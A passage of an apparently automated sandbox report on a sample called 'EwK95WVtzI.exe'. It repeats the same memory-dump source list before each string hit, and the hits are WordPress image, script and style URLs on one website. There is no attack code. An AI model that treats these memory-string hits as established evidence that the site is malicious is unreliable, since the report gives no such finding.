00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210920_231701_126.j
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210921_202845_707.j
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210921_203320_2064.
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10198_hflip.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10653_hflip.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.5
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 